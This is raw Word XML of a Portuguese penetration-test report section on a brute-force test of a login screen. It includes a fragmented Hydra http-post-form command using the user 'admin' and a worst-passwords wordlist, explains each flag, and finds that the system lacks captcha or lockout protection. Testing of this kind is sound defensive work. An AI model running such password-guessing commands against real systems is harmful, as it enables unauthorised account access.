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60" w:rsidRDefault="00F15F82" w:rsidP="00AC10D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 w:rsidRPr="00F15B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.3 RELATÓRIO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DE EXECUÇÃO DOS TESTES </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:line="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Nessa sessão, serão relatados, de forma detalhada, os resultados </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>obtidos na execução dos testes em cada iteração planejada. Serão apresentados os passos utilizados para detectar possíveis vulnerabilidades, as vulnerabilidades encontrada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e quais danos estas podem causar caso sejam exploradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15F82" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:line="0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630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="2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F15F82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F3154F" w:rsidRPr="00F15F82" w:rsidRDefault="00F3154F" w:rsidP="00F3154F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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00E52521" w:rsidP="00AC10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4.3.1.1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Tela </w:t>
      </w:r>
      <w:proofErr w:type="spell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Força Bruta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01/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00E52521" w:rsidP="00AC10D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Duração</w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> total das sessões executadas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1</w:t>
      </w:r>
      <w:r w:rsidR="00546F66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hora e 20 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1803" w:rsidRDefault="004E1803" w:rsidP="00AC10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2521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Default="00546F66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C3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">abordada no </w:t>
      </w:r>
      <w:r w:rsidR="00F15B60" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">capítulo </w:t>
      </w:r>
      <w:r w:rsidR="00F15B60" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00CC3790" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F15B60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para</w:t>
      </w:r>
      <w:r w:rsidR="003E1ACB" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontrar</w:t>
      </w:r>
      <w:r w:rsidR="00417333">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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or</w:t>
      </w:r>
      <w:r w:rsidR="00417333">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> meio d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CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tentativ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e erro, um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de um usuário e senha válido</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s para </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>acessar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o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82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E1803" w:rsidRPr="00F15F82" w:rsidRDefault="004E1803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2A0DD8" w:rsidP="00AC10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2A0DD8" w:rsidRPr="00F15F82" w:rsidRDefault="00546F66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Configurar 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, </w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com o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arâmetros</w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D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12C3D" w:rsidRPr="00F15F82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="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senha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,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para que ela realize os testes de acesso com força bruta na tela de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EC2366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0DD8" w:rsidRPr="00F15F82" w:rsidRDefault="002A0DD8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A0DD8" w:rsidRPr="00F15F82" w:rsidRDefault="00827015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C97F3F" w:rsidRDefault="00EC2366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spera-se que o sistema possua </w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proteção</w:t>
      </w:r>
      <w:r w:rsidR="00FF6B3E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F6B3E" w:rsidRPr="004E1803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Antis</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E1803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E1803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Captcha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E1803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que impeça a ferramenta automatizada de prosseguir até o fim do teste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4E1803" w:rsidRPr="004E1803" w:rsidRDefault="004E1803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E1803" w:rsidRPr="004E1803" w:rsidRDefault="005967D5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E1803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C12C3D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ndefinido.</w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A ferramenta está esperando </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82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="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetros quando, a tela de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C12C3D"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C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> só utiliza 2 na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7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E1803" w:rsidRPr="00F15F82" w:rsidRDefault="004E1803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B3CB1" w:rsidRDefault="00FB3CB1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CB1" w:rsidRDefault="00FB3CB1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2A0DD8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Inserir um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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de usuário válido e possíveis senhas mais comuns utilizadas para acesso de um sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00C97F3F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7F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00827015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C97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00C97F3F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spera-se que o siste</w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ma interrompa as sessões</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de testes</w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">configuradas na ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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:rsidR="000A6729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hydra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l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admin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P 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forcaBruta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htt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-post-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form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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC10DC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false”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A6729" w:rsidRPr="00F15F82" w:rsidRDefault="000A6729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No comando acima:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED180C" w:rsidRPr="00AC10DC" w:rsidRDefault="00ED180C" w:rsidP="00630433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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">” executa a ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="00630433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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“-l” significa o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC10DC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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado no momento. Nesse caso, deve ser sempre “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC10DC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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”, pois foi o único usuário válido fornecido para a realização de testes no </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC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AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="00630433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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“-P” aponta para o arquivo contendo as senhas que a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tentará utilizar para acessar o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC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AC10DC" w:rsidRDefault="00B7146E" w:rsidP="00630433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="008C6DC7" w:rsidRPr="00AC10DC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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="00DD5893" w:rsidP="00630433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http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>-post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informa</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o método utilizado</w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>para fazer a requisição ao servidor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C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">do </w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>protocolo</w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="00630433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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AC10DC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AC10DC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AC10DC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AC10DC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AC10DC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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=false”  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC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:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="00630433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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">USER é onde a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC10DC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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> deve inserir o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC10DC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="003745C8" w:rsidRPr="00AC10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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="00630433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C10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS é onde a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC10DC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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> deve inserir a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senha</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC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D60336" w:rsidRDefault="005967D5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F71E4B" w:rsidP="00AC10DC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>O sistema não p</w:t>
      </w:r>
      <w:r w:rsidR="00517685" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Todas as sessões </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>de teste</w:t>
      </w:r>
      <w:r w:rsidR="00564674" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s foram executadas 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pela </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F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64674" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sem nenhum tipo de interrupção por parte do sistema alvo.</w:t>
      </w:r>
      <w:r w:rsidR="00564674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2442F" w:rsidRDefault="0062442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C10DC" w:rsidRDefault="00AC10D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56110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Configurar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executar </w:t>
      </w:r>
      <w:r w:rsidR="000A6729" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uma s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s utilizando o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82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”, cadastrado na base de dados do sistema</w:t>
      </w:r>
      <w:r w:rsidR="000A6729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ED180C" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>explora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. Além disso, usar um dicionário de senhas retiradas da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ista de Piores Senhas de 2015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a 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plashData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[1]. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00C97F3F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97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00827015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564674" w:rsidRPr="00F15F82" w:rsidRDefault="00564674" w:rsidP="0081785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spera-se que o sistema possua </w:t>
      </w:r>
      <w:r w:rsidR="000A6729" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">proteção </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A6729" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Antis</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
